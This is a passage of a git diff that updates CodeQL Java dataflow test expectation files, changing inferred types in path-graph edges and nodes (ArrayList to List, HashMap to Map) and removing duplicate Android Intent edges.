B.java:247:5:247:18 | new MyLocal2(...) 
[post update] : MyLocal2 [List l2, ] : String | B.java:247:5:247:18 | List l2 : List [] : String | provenance | | | B.java:247:5:247:18 | new MyLocal2(...) [pre constructor] : MyLocal2 [String s] : String | B.java:235:7:235:14 | parameter this : MyLocal2 [String s] : String | provenance | | | B.java:247:5:247:18 | new MyLocal2(...) [pre constructor] : MyLocal2 [String s] : String | B.java:247:5:247:18 | new MyLocal2(...) : MyLocal2 [List l, ] : String | provenance | MaD:2 | -| B.java:248:10:248:10 | l : ArrayList [] : String | B.java:248:10:248:17 | get(...) | provenance | MaD:3 | -| B.java:249:10:249:11 | l2 : ArrayList [] : String | B.java:249:10:249:18 | get(...) | provenance | MaD:3 | +| B.java:248:10:248:10 | l : List [] : String | B.java:248:10:248:17 | get(...) | provenance | MaD:3 | +| B.java:249:10:249:11 | l2 : List [] : String | B.java:249:10:249:18 | get(...) | provenance | MaD:3 | | B.java:254:16:254:29 | source(...) : String | B.java:261:5:261:18 | String s : String | provenance | | | B.java:255:11:255:18 | parameter this : MyLocal3 [String s] : String | B.java:255:11:255:18 | this <.method> : MyLocal3 [String s] : String | provenance | | | B.java:255:11:255:18 | parameter this : MyLocal3 [String s] : String | B.java:256:18:256:18 | this : MyLocal3 [String s] : String | provenance | | 
@@ -300,12 +300,12 @@ nodes | B.java:13:5:13:6 | l1 : ArrayList [] : String | semmle.label | l1 : ArrayList [] : String | | B.java:13:16:13:16 | e : String | semmle.label | e : String | | B.java:13:16:13:29 | ...->... [post update] : new Consumer(...) { ... } [List l2, ] : String | semmle.label | ...->... [post update] : new Consumer(...) { ... } [List l2, ] : String | -| B.java:13:16:13:29 | List l2 : ArrayList [] : String | semmle.label | List l2 : ArrayList [] : String | +| B.java:13:16:13:29 | List l2 : List [] : String | semmle.label | List l2 : List [] : String | | B.java:13:16:13:29 | parameter this [Return] : new Consumer(...) { ... } [List l2, ] : String | semmle.label | parameter this [Return] : new Consumer(...) { ... } [List l2, ] : String | | B.java:13:21:13:22 | l2 [post update] : ArrayList [] : String | semmle.label | l2 [post update] : ArrayList [] : String | | B.java:13:21:13:22 | this : new Consumer(...) { ... } [List l2, ] : String | semmle.label | this : new Consumer(...) { ... } [List l2, ] : String | | B.java:13:28:13:28 | e : String | semmle.label | e : String | -| B.java:14:10:14:11 | l2 : ArrayList [] : String | semmle.label | l2 : ArrayList [] : String | +| B.java:14:10:14:11 | l2 : List [] : String | semmle.label | l2 : List [] : String | | B.java:14:10:14:18 | get(...) | semmle.label | get(...) | | B.java:22:26:22:26 | x : String | semmle.label | x : String | | B.java:22:26:22:71 | parameter this [Return] : new Consumer(...) { ... } [B other, bf1] : String | semmle.label | parameter this [Return] : new Consumer(...) { ... } [B other, bf1] : String | 
@@ -319,14 +319,14 @@ nodes | B.java:34:10:34:18 | other.bf1 | semmle.label | other.bf1 | | B.java:38:23:38:45 | inp : HashMap [] : String | semmle.label | inp : HashMap [] : String | | B.java:38:23:38:45 | inp : HashMap [] : String | semmle.label | inp : HashMap [] : String | -| B.java:38:48:38:70 | out [Return] : HashMap [] : String | semmle.label | out [Return] : HashMap [] : String | -| B.java:38:48:38:70 | out [Return] : HashMap [] : String | semmle.label | out [Return] : HashMap [] : String | +| B.java:38:48:38:70 | out [Return] : Map [] : String | semmle.label | out [Return] : Map [] : String | +| B.java:38:48:38:70 | out [Return] : Map [] : String | semmle.label | out [Return] : Map [] : String | | B.java:39:5:39:7 | inp : HashMap [] : String | semmle.label | inp : HashMap [] : String | | B.java:39:5:39:7 | inp : HashMap [] : String | semmle.label | inp : HashMap [] : String | | B.java:39:17:39:56 | ...->... [post update] : new BiConsumer(...) { ... } [out, ] : String | semmle.label | ...->... [post update] : new BiConsumer(...) { ... } [out, ] : String | | B.java:39:17:39:56 | ...->... [post update] : new BiConsumer(...) { ... } [out, ] : String | semmle.label | ...->... [post update] : new BiConsumer(...) { ... } [out, ] : String | -| B.java:39:17:39:56 | out : HashMap [] : String | semmle.label | out : HashMap [] : String | -| B.java:39:17:39:56 | out : HashMap [] : String | semmle.label | out : HashMap [] : String | +| B.java:39:17:39:56 | out : Map [] : String | semmle.label | out : Map [] : String | +| B.java:39:17:39:56 | out : Map [] : String | semmle.label | out : Map [] : String | | B.java:39:17:39:56 | parameter this [Return] : new BiConsumer(...) { ... } [out, ] : String | semmle.label | parameter this [Return] : new BiConsumer(...) { ... } [out, ] : String | | B.java:39:17:39:56 | parameter this [Return] : new BiConsumer(...) { ... } [out, ] : String | semmle.label | parameter this [Return] : new BiConsumer(...) { ... 
} [out, ] : String | | B.java:39:18:39:20 | key : String | semmle.label | key : String | 
@@ -390,23 +390,23 @@ nodes | B.java:103:12:103:13 | l1 : ArrayList [] : String | semmle.label | l1 : ArrayList [] : String | | B.java:104:16:104:32 | source(...) : String | semmle.label | source(...) : String | | B.java:107:5:107:6 | l2 : ArrayList [, ] : String | semmle.label | l2 : ArrayList [, ] : String | -| B.java:107:16:107:16 | l : ArrayList [] : String | semmle.label | l : ArrayList [] : String | +| B.java:107:16:107:16 | l : List [] : String | semmle.label | l : List [] : String | | B.java:107:16:111:6 | ...->... : new Consumer>(...) { ... } [String s] : String | semmle.label | ...->... : new Consumer>(...) { ... } [String s] : String | | B.java:107:16:111:6 | ...->... [post update] : new Consumer>(...) { ... } [List out1, ] : String | semmle.label | ...->... [post update] : new Consumer>(...) { ... } [List out1, ] : String | | B.java:107:16:111:6 | ...->... [post update] : new Consumer>(...) { ... } [List out2, ] : String | semmle.label | ...->... [post update] : new Consumer>(...) { ... } [List out2, ] : String | -| B.java:107:16:111:6 | List out1 : ArrayList [] : String | semmle.label | List out1 : ArrayList [] : String | -| B.java:107:16:111:6 | List out2 : ArrayList [] : String | semmle.label | List out2 : ArrayList [] : String | +| B.java:107:16:111:6 | List out1 : List [] : String | semmle.label | List out1 : List [] : String | +| B.java:107:16:111:6 | List out2 : List [] : String | semmle.label | List out2 : List [] : String | | B.java:107:16:111:6 | String s : String | semmle.label | String s : String | | B.java:107:16:111:6 | parameter this : new Consumer>(...) { ... } [String s] : String | semmle.label | parameter this : new Consumer>(...) { ... } [String s] : String | | B.java:107:16:111:6 | parameter this [Return] : new Consumer>(...) { ... } [List out1, ] : String | semmle.label | parameter this [Return] : new Consumer>(...) { ... } [List out1, ] : String | | B.java:107:16:111:6 | parameter this [Return] : new Consumer>(...) { ... 
} [List out2, ] : String | semmle.label | parameter this [Return] : new Consumer>(...) { ... } [List out2, ] : String | -| B.java:107:21:107:21 | l : ArrayList [] : String | semmle.label | l : ArrayList [] : String | +| B.java:107:21:107:21 | l : List [] : String | semmle.label | l : List [] : String | | B.java:107:31:107:31 | x : String | semmle.label | x : String | | B.java:107:31:111:5 | ...->... : new Consumer(...) { ... } [String s] : String | semmle.label | ...->... : new Consumer(...) { ... } [String s] : String | | B.java:107:31:111:5 | ...->... [post update] : new Consumer(...) { ... } [List out1, ] : String | semmle.label | ...->... [post update] : new Consumer(...) { ... } [List out1, ] : String | | B.java:107:31:111:5 | ...->... [post update] : new Consumer(...) { ... } [List out2, ] : String | semmle.label | ...->... [post update] : new Consumer(...) { ... } [List out2, ] : String | -| B.java:107:31:111:5 | List out1 : ArrayList [] : String | semmle.label | List out1 : ArrayList [] : String | -| B.java:107:31:111:5 | List out2 : ArrayList [] : String | semmle.label | List out2 : ArrayList [] : String | +| B.java:107:31:111:5 | List out1 : List [] : String | semmle.label | List out1 : List [] : String | +| B.java:107:31:111:5 | List out2 : List [] : String | semmle.label | List out2 : List [] : String | | B.java:107:31:111:5 | String s : String | semmle.label | String s : String | | B.java:107:31:111:5 | parameter this : new Consumer(...) { ... } [String s] : String | semmle.label | parameter this : new Consumer(...) { ... } [String s] : String | | B.java:107:31:111:5 | parameter this [Return] : new Consumer(...) { ... } [List out1, ] : String | semmle.label | parameter this [Return] : new Consumer(...) { ... } [List out1, ] : String | 
@@ -423,9 +423,9 @@ nodes | B.java:110:7:110:10 | this : new Consumer(...) { ... } [List out2, ] : String | semmle.label | this : new Consumer(...) { ... } [List out2, ] : String | | B.java:110:16:110:16 | s : String | semmle.label | s : String | | B.java:110:16:110:16 | this : new Consumer(...) { ... } [String s] : String | semmle.label | this : new Consumer(...) { ... } [String s] : String | -| B.java:112:10:112:13 | out1 : ArrayList [] : String | semmle.label | out1 : ArrayList [] : String | +| B.java:112:10:112:13 | out1 : List [] : String | semmle.label | out1 : List [] : String | | B.java:112:10:112:20 | get(...) | semmle.label | get(...) | -| B.java:113:10:113:13 | out2 : ArrayList [] : String | semmle.label | out2 : ArrayList [] : String | +| B.java:113:10:113:13 | out2 : List [] : String | semmle.label | out2 : List [] : String | | B.java:113:10:113:20 | get(...) | semmle.label | get(...) | | B.java:126:19:126:22 | parameter this [Return] : new TwoRuns(...) { ... } [List l1, ] : String | semmle.label | parameter this [Return] : new TwoRuns(...) { ... } [List l1, ] : String | | B.java:127:9:127:10 | l1 [post update] : ArrayList [] : String | semmle.label | l1 [post update] : ArrayList [] : String | 
@@ -438,13 +438,13 @@ nodes | B.java:131:16:131:17 | l1 : ArrayList [] : String | semmle.label | l1 : ArrayList [] : String | | B.java:131:16:131:17 | this : new TwoRuns(...) { ... } [List l1, ] : String | semmle.label | this : new TwoRuns(...) { ... } [List l1, ] : String | | B.java:131:16:131:24 | get(...) : String | semmle.label | get(...) : String | -| B.java:136:5:136:5 | List l1 : ArrayList [] : String | semmle.label | List l1 : ArrayList [] : String | +| B.java:136:5:136:5 | List l1 : List [] : String | semmle.label | List l1 : List [] : String | | B.java:136:5:136:5 | r [post update] : new TwoRuns(...) { ... } [List l1, ] : String | semmle.label | r [post update] : new TwoRuns(...) { ... } [List l1, ] : String | -| B.java:137:5:137:5 | List l1 : ArrayList [] : String | semmle.label | List l1 : ArrayList [] : String | -| B.java:137:5:137:5 | List l2 : ArrayList [] : String | semmle.label | List l2 : ArrayList [] : String | +| B.java:137:5:137:5 | List l1 : List [] : String | semmle.label | List l1 : List [] : String | +| B.java:137:5:137:5 | List l2 : List [] : String | semmle.label | List l2 : List [] : String | | B.java:137:5:137:5 | r : new TwoRuns(...) { ... } [List l1, ] : String | semmle.label | r : new TwoRuns(...) { ... } [List l1, ] : String | | B.java:137:5:137:5 | r [post update] : new TwoRuns(...) { ... } [List l2, ] : String | semmle.label | r [post update] : new TwoRuns(...) { ... } [List l2, ] : String | -| B.java:138:10:138:11 | l2 : ArrayList [] : String | semmle.label | l2 : ArrayList [] : String | +| B.java:138:10:138:11 | l2 : List [] : String | semmle.label | l2 : List [] : String | | B.java:138:10:138:18 | get(...) | semmle.label | get(...) | | B.java:142:16:142:31 | source(...) : String | semmle.label | source(...) : String | | B.java:145:7:145:13 | parameter this : MyLocal [String s] : String | semmle.label | parameter this : MyLocal [String s] : String | 
@@ -499,10 +499,10 @@ nodes | B.java:175:5:175:6 | String s2 : String | semmle.label | String s2 : String | | B.java:175:5:175:6 | m1 : MyLocal [String s2] : String | semmle.label | m1 : MyLocal [String s2] : String | | B.java:175:5:175:6 | m1 : MyLocal [f] : String | semmle.label | m1 : MyLocal [f] : String | -| B.java:177:5:177:6 | List l : ArrayList [] : String | semmle.label | List l : ArrayList [] : String | +| B.java:177:5:177:6 | List l : List [] : String | semmle.label | List l : List [] : String | | B.java:177:5:177:6 | m1 [post update] : MyLocal [List l, ] : String | semmle.label | m1 [post update] : MyLocal [List l, ] : String | | B.java:177:12:177:27 | source(...) : String | semmle.label | source(...) : String | -| B.java:178:10:178:11 | List l : ArrayList [] : String | semmle.label | List l : ArrayList [] : String | +| B.java:178:10:178:11 | List l : List [] : String | semmle.label | List l : List [] : String | | B.java:178:10:178:11 | m2 : MyLocal [List l, ] : String | semmle.label | m2 : MyLocal [List l, ] : String | | B.java:178:10:178:17 | get(...) | semmle.label | get(...) | | B.java:203:16:203:42 | source(...) : String | semmle.label | source(...) : String | 
@@ -515,17 +515,17 @@ nodes | B.java:207:15:207:42 | source(...) : String | semmle.label | source(...) : String | | B.java:209:19:211:5 | parameter this : new Runnable(...) { ... } [String s] : String | semmle.label | parameter this : new Runnable(...) { ... } [String s] : String | | B.java:209:19:211:5 | parameter this [Return] : new Runnable(...) { ... } [List out, ] : String | semmle.label | parameter this [Return] : new Runnable(...) { ... } [List out, ] : String | -| B.java:210:7:210:8 | List out : ArrayList [] : String | semmle.label | List out : ArrayList [] : String | +| B.java:210:7:210:8 | List out : List [] : String | semmle.label | List out : List [] : String | | B.java:210:7:210:8 | String s : String | semmle.label | String s : String | | B.java:210:7:210:8 | r1 : new Runnable(...) { ... } [String s] : String | semmle.label | r1 : new Runnable(...) { ... } [String s] : String | | B.java:210:7:210:8 | r1 [post update] : new Runnable(...) { ... } [List out, ] : String | semmle.label | r1 [post update] : new Runnable(...) { ... } [List out, ] : String | | B.java:210:7:210:8 | this : new Runnable(...) { ... } [List out, ] : String | semmle.label | this : new Runnable(...) { ... } [List out, ] : String | | B.java:210:7:210:8 | this : new Runnable(...) { ... } [String s] : String | semmle.label | this : new Runnable(...) { ... } [String s] : String | -| B.java:212:5:212:6 | List out : ArrayList [] : String | semmle.label | List out : ArrayList [] : String | +| B.java:212:5:212:6 | List out : List [] : String | semmle.label | List out : List [] : String | | B.java:212:5:212:6 | String s : String | semmle.label | String s : String | | B.java:212:5:212:6 | r2 : new Runnable(...) { ... } [String s] : String | semmle.label | r2 : new Runnable(...) { ... } [String s] : String | | B.java:212:5:212:6 | r2 [post update] : new Runnable(...) { ... } [List out, ] : String | semmle.label | r2 [post update] : new Runnable(...) { ... 
} [List out, ] : String | -| B.java:213:10:213:12 | out : ArrayList [] : String | semmle.label | out : ArrayList [] : String | +| B.java:213:10:213:12 | out : List [] : String | semmle.label | out : List [] : String | | B.java:213:10:213:19 | get(...) | semmle.label | get(...) | | B.java:231:16:231:28 | source(...) : String | semmle.label | source(...) : String | | B.java:235:7:235:14 | parameter this : MyLocal2 [String s] : String | semmle.label | parameter this : MyLocal2 [String s] : String | 
@@ -541,15 +541,15 @@ nodes | B.java:241:16:241:16 | l : ArrayList [] : String | semmle.label | l : ArrayList [] : String | | B.java:241:16:241:16 | this : MyLocal2 [List l, ] : String | semmle.label | this : MyLocal2 [List l, ] : String | | B.java:241:16:241:23 | get(...) : String | semmle.label | get(...) : String | -| B.java:247:5:247:18 | List l2 : ArrayList [] : String | semmle.label | List l2 : ArrayList [] : String | -| B.java:247:5:247:18 | List l : ArrayList [] : String | semmle.label | List l : ArrayList [] : String | +| B.java:247:5:247:18 | List l2 : List [] : String | semmle.label | List l2 : List [] : String | +| B.java:247:5:247:18 | List l : List [] : String | semmle.label | List l : List [] : String | | B.java:247:5:247:18 | String s : String | semmle.label | String s : String | | B.java:247:5:247:18 | new MyLocal2(...) : MyLocal2 [List l, ] : String | semmle.label | new MyLocal2(...) : MyLocal2 [List l, ] : String | | B.java:247:5:247:18 | new MyLocal2(...) [post update] : MyLocal2 [List l2, ] : String | semmle.label | new MyLocal2(...) [post update] : MyLocal2 [List l2, ] : String | | B.java:247:5:247:18 | new MyLocal2(...) [pre constructor] : MyLocal2 [String s] : String | semmle.label | new MyLocal2(...) [pre constructor] : MyLocal2 [String s] : String | -| B.java:248:10:248:10 | l : ArrayList [] : String | semmle.label | l : ArrayList [] : String | +| B.java:248:10:248:10 | l : List [] : String | semmle.label | l : List [] : String | | B.java:248:10:248:17 | get(...) | semmle.label | get(...) | -| B.java:249:10:249:11 | l2 : ArrayList [] : String | semmle.label | l2 : ArrayList [] : String | +| B.java:249:10:249:11 | l2 : List [] : String | semmle.label | l2 : List [] : String | | B.java:249:10:249:18 | get(...) | semmle.label | get(...) | | B.java:254:16:254:29 | source(...) : String | semmle.label | source(...) 
: String | | B.java:255:11:255:18 | parameter this : MyLocal3 [String s] : String | semmle.label | parameter this : MyLocal3 [String s] : String | 
@@ -595,11 +595,11 @@ subpaths | B.java:30:14:30:24 | source(...) : String | B.java:22:26:22:26 | x : String | B.java:22:26:22:71 | parameter this [Return] : new Consumer(...) { ... } [B other, bf1] : String | B.java:30:5:30:5 | f [post update] : new Consumer(...) { ... } [B other, bf1] : String | | B.java:39:5:39:7 | inp : HashMap [] : String | B.java:39:18:39:20 | key : String | B.java:39:17:39:56 | parameter this [Return] : new BiConsumer(...) { ... } [out, ] : String | B.java:39:17:39:56 | ...->... [post update] : new BiConsumer(...) { ... } [out, ] : String | | B.java:39:5:39:7 | inp : HashMap [] : String | B.java:39:23:39:27 | value : String | B.java:39:17:39:56 | parameter this [Return] : new BiConsumer(...) { ... } [out, ] : String | B.java:39:17:39:56 | ...->... [post update] : new BiConsumer(...) { ... } [out, ] : String | -| B.java:46:13:46:14 | m1 : HashMap [] : String | B.java:38:23:38:45 | inp : HashMap [] : String | B.java:38:48:38:70 | out [Return] : HashMap [] : String | B.java:46:17:46:18 | m2 [post update] : HashMap [] : String | -| B.java:46:13:46:14 | m1 : HashMap [] : String | B.java:38:23:38:45 | inp : HashMap [] : String | B.java:38:48:38:70 | out [Return] : HashMap [] : String | B.java:46:17:46:18 | m2 [post update] : HashMap [] : String | -| B.java:107:5:107:6 | l2 : ArrayList [, ] : String | B.java:107:16:107:16 | l : ArrayList [] : String | B.java:107:16:111:6 | parameter this [Return] : new Consumer>(...) { ... } [List out1, ] : String | B.java:107:16:111:6 | ...->... [post update] : new Consumer>(...) { ... 
} [List out1, ] : String | +| B.java:46:13:46:14 | m1 : HashMap [] : String | B.java:38:23:38:45 | inp : HashMap [] : String | B.java:38:48:38:70 | out [Return] : Map [] : String | B.java:46:17:46:18 | m2 [post update] : HashMap [] : String | +| B.java:46:13:46:14 | m1 : HashMap [] : String | B.java:38:23:38:45 | inp : HashMap [] : String | B.java:38:48:38:70 | out [Return] : Map [] : String | B.java:46:17:46:18 | m2 [post update] : HashMap [] : String | +| B.java:107:5:107:6 | l2 : ArrayList [, ] : String | B.java:107:16:107:16 | l : List [] : String | B.java:107:16:111:6 | parameter this [Return] : new Consumer>(...) { ... } [List out1, ] : String | B.java:107:16:111:6 | ...->... [post update] : new Consumer>(...) { ... } [List out1, ] : String | | B.java:107:16:111:6 | ...->... : new Consumer>(...) { ... } [String s] : String | B.java:107:16:111:6 | parameter this : new Consumer>(...) { ... } [String s] : String | B.java:107:16:111:6 | parameter this [Return] : new Consumer>(...) { ... } [List out2, ] : String | B.java:107:16:111:6 | ...->... [post update] : new Consumer>(...) { ... } [List out2, ] : String | -| B.java:107:21:107:21 | l : ArrayList [] : String | B.java:107:31:107:31 | x : String | B.java:107:31:111:5 | parameter this [Return] : new Consumer(...) { ... } [List out1, ] : String | B.java:107:31:111:5 | ...->... [post update] : new Consumer(...) { ... } [List out1, ] : String | +| B.java:107:21:107:21 | l : List [] : String | B.java:107:31:107:31 | x : String | B.java:107:31:111:5 | parameter this [Return] : new Consumer(...) { ... } [List out1, ] : String | B.java:107:31:111:5 | ...->... [post update] : new Consumer(...) { ... } [List out1, ] : String | | B.java:107:31:111:5 | ...->... : new Consumer(...) { ... } [String s] : String | B.java:107:31:111:5 | parameter this : new Consumer(...) { ... } [String s] : String | B.java:107:31:111:5 | parameter this [Return] : new Consumer(...) { ... } [List out2, ] : String | B.java:107:31:111:5 | ...->... 
[post update] : new Consumer(...) { ... } [List out2, ] : String | | B.java:137:5:137:5 | r : new TwoRuns(...) { ... } [List l1, ] : String | B.java:130:19:130:22 | parameter this : new TwoRuns(...) { ... } [List l1, ] : String | B.java:130:19:130:22 | parameter this [Return] : new TwoRuns(...) { ... } [List l2, ] : String | B.java:137:5:137:5 | r [post update] : new TwoRuns(...) { ... } [List l2, ] : String | | B.java:148:17:148:29 | new MyLocal(...) [pre constructor] : MyLocal [String s] : String | B.java:145:7:145:13 | parameter this : MyLocal [String s] : String | B.java:145:7:145:13 | parameter this [Return] : MyLocal [f] : String | B.java:148:17:148:29 | new MyLocal(...) : MyLocal [f] : String | diff --git a/java/ql/test/library-tests/frameworks/android/intent/test.expected b/java/ql/test/library-tests/frameworks/android/intent/test.expected index 6e840c4f235..ed9eb6fb7ce 100644 --- a/java/ql/test/library-tests/frameworks/android/intent/test.expected +++ b/java/ql/test/library-tests/frameworks/android/intent/test.expected 
@@ -184,96 +184,50 @@ edges | Test.java:22:44:22:45 | it : Set [] : String | Test.java:22:44:22:56 | iterator(...) : Iterator [] : String | provenance | MaD:179 | | Test.java:22:44:22:56 | iterator(...) : Iterator [] : String | Test.java:22:44:22:63 | next(...) : String | provenance | MaD:180 | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : String | provenance | | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : String | provenance | | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : ArrayList | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : ArrayList | provenance | | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : ArrayList | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : ArrayList | provenance | | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Boolean | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Boolean | provenance | | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Boolean | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Boolean | provenance | | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Bundle | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Bundle | provenance | | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Bundle | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Bundle | provenance | | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : CharSequence | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : CharSequence | provenance | | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : 
CharSequence | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : CharSequence | provenance | | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : CharSequence[] | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : CharSequence[] | provenance | | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : CharSequence[] | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : CharSequence[] | provenance | | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Intent | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Intent | provenance | | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Intent | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Intent | provenance | | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : IntentSender | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : IntentSender | provenance | | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : IntentSender | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : IntentSender | provenance | | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Number | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Number | provenance | | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Number | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Number | provenance | | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Object | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Object | provenance | | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Object | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Object | provenance | | | Test.java:23:26:23:33 | i : Intent 
[android.content.Intent.extras, ] : Parcelable | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Parcelable | provenance | | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Parcelable | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Parcelable | provenance | | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Parcelable[] | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Parcelable[] | provenance | | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Parcelable[] | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Parcelable[] | provenance | | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Serializable | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Serializable | provenance | | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Serializable | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Serializable | provenance | | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : String | provenance | | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : String | provenance | | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String[] | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : String[] | provenance | | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String[] | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : String[] | provenance | | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : boolean[] | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : boolean[] | provenance | | | 
Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : boolean[] | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : boolean[] | provenance | | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : byte[] | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : byte[] | provenance | | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : byte[] | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : byte[] | provenance | | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : char[] | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : char[] | provenance | | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : char[] | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : char[] | provenance | | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : double[] | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : double[] | provenance | | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : double[] | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : double[] | provenance | | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : float[] | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : float[] | provenance | | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : float[] | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : float[] | provenance | | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : int[] | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : int[] | provenance | | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : int[] | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : int[] | provenance | | -| Test.java:23:26:23:33 | i : 
Intent [android.content.Intent.extras, ] : long[] | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : long[] | provenance | | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : long[] | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : long[] | provenance | | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : short[] | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : short[] | provenance | | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : short[] | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : short[] | provenance | | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | provenance | MaD:34 | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | provenance | MaD:34 | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : ArrayList | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : ArrayList | provenance | MaD:34 | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : ArrayList | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : ArrayList | provenance | MaD:34 | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Boolean | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Boolean | provenance | MaD:34 | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Boolean | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Boolean | provenance | MaD:34 | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Bundle | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Bundle | provenance | MaD:34 | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Bundle | Test.java:23:45:23:57 | getExtras(...) 
